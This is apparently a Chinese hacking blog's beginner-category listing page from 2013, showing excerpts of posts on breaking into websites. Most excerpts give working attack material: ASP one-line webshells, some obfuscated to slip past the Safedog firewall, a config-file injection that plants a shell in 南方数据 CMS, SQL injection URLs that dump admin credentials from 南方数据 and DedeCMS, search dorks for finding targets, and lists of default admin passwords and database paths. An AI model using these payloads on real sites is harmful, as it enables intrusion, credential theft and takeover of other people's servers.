菜鸟入门 | 七行者博客 - 关注网络安全,黑客技术爱好者

KesionCMS后台直接拿shell教程

以前就有人公布过拿shell过程今天再给大家具体演示一下 KesionCMS V6.5 拿shell！演示网站：www.xxxx.com 直接打开后台 admin/login.asp 一般默认密码：admin admin888 认证码 8888 下面看我的截图操作：上面搞完后点击促成生成/1.asp/目录我们再添加一个静态标签直接把一句话加上去如图上面全部搞好后点击保存标签然后自己添加个自定义页面，名字什么的可以随...阅读全文

作者：qxz_xp | 发布：2013年8月14日 | 分类：菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
阅读全文

来教你破解电话号码

去年360的老大周鸿祎的电话被破解之后，这个话题貌似在IT圈引起了不小的波动，其实真的很简单，任何菜鸟都可以在几分钟之内做到！看下面步骤：第一步，在电脑上下载一款音频处理分析软件(如Adobe Soundbooth等)和音频格式转换软件(如格式工厂等)，并安装完成。第二步，打开电话座机的免提功能，随意拨打一个电话号码；与此同时，利用手机或录音笔对拨号音进行录音。第...阅读全文

作者：qxz_xp | 发布：2013年8月14日 | 分类：菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
阅读全文

南方数据企业网站管理系统12.0拿SHELL方法

南方数据企业网站管理系统12.0插配置文件拿SHELL 在我们拿到南方数据企业管理系统后台账号密码后，可以使用下面的方法来拿shell 进入后台后点击系统管理网站配置随便找个地方修改成 “%><%eval request(“qxz”)%><%Const nidaye=”xzlbb.com 然后用一句话客户端连接http://目标网站/inc/config.asp就OK了！阅读全文

作者：qxz_xp | 发布：2013年8月12日 | 分类：菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
阅读全文

各类路由器默认账号密码大全

品牌：ViKing 用户名:adsl 密码:adsl1234 品牌：实达默认IP：192.168.10.1 版本：2110ehr v3.20、 2110ehr v3.21、 2110ehr v3.51 用户名：admin 密码：conexant 版本：2110ehr v4.5 用户名：root 密码：grouter 版本：2110eh v3.51（中文web界面）用户名：admin 密码：starnetadsl 品牌：艾玛默认IP：192.168.101.1 用户名：admin 密码：admin 品牌：神州数码/华硕用户...阅读全文

作者：qxz_xp | 发布：2013年8月01日 | 分类：安全知识, 网络安全, 菜鸟入门, 黑客攻防 | 暂无评论
阅读全文

过安全狗v3.0

asp <%eval””&(“e”&”v”&”a”&”l”&”(“&”r”&”e”&”q”&”u”&”e”&”s”&”t”&”(“&”q”&”-“&”x&#...阅读全文

作者：qxz_xp | 发布：2013年7月30日 | 分类：菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
阅读全文

南方数据网站漏洞

漏洞影响版本 v10.0 v11.0 关键字：inurl:”HomeMarket.asp” 默认后台：/admin 直接爆用户密码： http://www.xxx.com/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’ 拿shell方法貌似有4种： 1、注册用户上传拿shell，这...阅读全文

作者：qxz_xp | 发布：2013年7月28日 | 分类：菜鸟入门, 黑客攻防 | 1条评论
阅读全文

各种过安全狗一句话木马asp,php,aspx一句话

几个变性的asp–过防火墙过狗效果都不错 <%Y=request(“x”)%> <%execute(Y)%> <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“sz”))%> <%eval””& (“e”&”v”&”a”&”l”&”(“&”r”&a...阅读全文

作者：qxz_xp | 发布：2013年7月27日 | 分类：菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
阅读全文

入侵dedecms站找后台的一些小经验分享

首先：注入exp 有时候有些 /plus/目录换成了 /plugins目录 /plugins/search.php?keyword=as&typeArr[111%3D@`\’`) +UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+ from+`%23@__admin`%23@`\’`+]=a /plus/search.php?keyword=as&typeArr[111%3D@`\...阅读全文

作者：qxz_xp | 发布：2013年7月27日 | 分类：菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
阅读全文

各种网站数据库默认路径大全

数据库默认路径全揭秘 db/ewebeditor.mdb ewebeditor默认数据库 /database/NewCloud6.mdb 新云管理系统6.0数据库 eWebEditor/admin_login.asp 默认后台 database/article.asp //贫龙文章管理系统 /data/dvbbs7.mdb 动网论坛数据库 7.X /databackup/dvbbs7.mdb 动网论坛默认备份数据库 7.0-7.1 /bbs/databackup/dvbbs7.mdb /admin/data/qcdn_news.mdb 青创文章管理系统数据库...阅读全文

作者：qxz_xp | 发布：2013年7月26日 | 分类：菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
阅读全文

利用ewebeditor编辑器入侵网站教程

eWebEditor编辑器建议最好检测下admin_style.asp文件是否可以直接访问直接到样式管理默认后台地址：/ewebeditor/admin_login.asp 默认后台地址：/admin/eWebEditor/Admin_Login.asp 默认后台地址：/admin/WebEditor/Admin_Login.asp 默认后台地址：/admin/Editor/Admin_Login.asp php默认后台地址:taivid_admin/eWebEditor/admin/login.php 使用默认密码：admin/admin 或...阅读全文

作者：qxz_xp | 发布：2013年7月26日 | 分类：菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
阅读全文

渗透流程祥解图

很多人想要对一个站点进行安全监测，但不知道步骤，下面我就发几张网站渗透流程图来说明下。阅读全文

作者：qxz_xp | 发布：2013年7月25日 | 分类：菜鸟入门, 黑客技术, 黑客攻防 | 1条评论
阅读全文

黑客犯罪与网赚

黑客犯罪与网赚本课学习的重点与掌握的内容: 我们要清楚的去分辨,去了解什么样的网络活动是犯罪. 我们要做合法公民. 不要为了荣誉或者一时冲动.去触犯法律. 刑法第285条（第六次修正后）对“非法侵入计算机信息系统罪定义、量刑” 原文：违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。刑法第285条（第七次修正后...阅读全文

作者：qxz_xp | 发布：2013年7月23日 | 分类：菜鸟入门, 黑客攻防 | 暂无评论
阅读全文

博客搜索

博客日历

近期文章

博客目录

电脑维修 (22)
- 其它技术 (8)
- 台式机维修 (5)
- 显示器维修 (3)
- 电脑软件 (3)
- 笔记本维修 (4)
网站运营 (65)
- seo优化 (45)
- 新闻资讯 (3)
- 网上创业 (8)
- 网站建设 (10)
- 网站推广 (7)
网络安全 (89)
- 入侵检测 (6)
- 安全知识 (27)
- 最新资讯 (21)
- 漏洞公布 (35)
- 病毒预警 (8)
腾讯QQ (81)
- QQ个性签名 (10)
- QQ个性网名 (18)
- QQ头像 (45)
- QQ技术 (6)
- QQ空间 (4)
黑客攻防 (486)
- 业界新闻 (178)
- 社工相关 (27)
- 菜鸟入门 (119)
- 黑客工具 (105)
- 黑客技术 (139)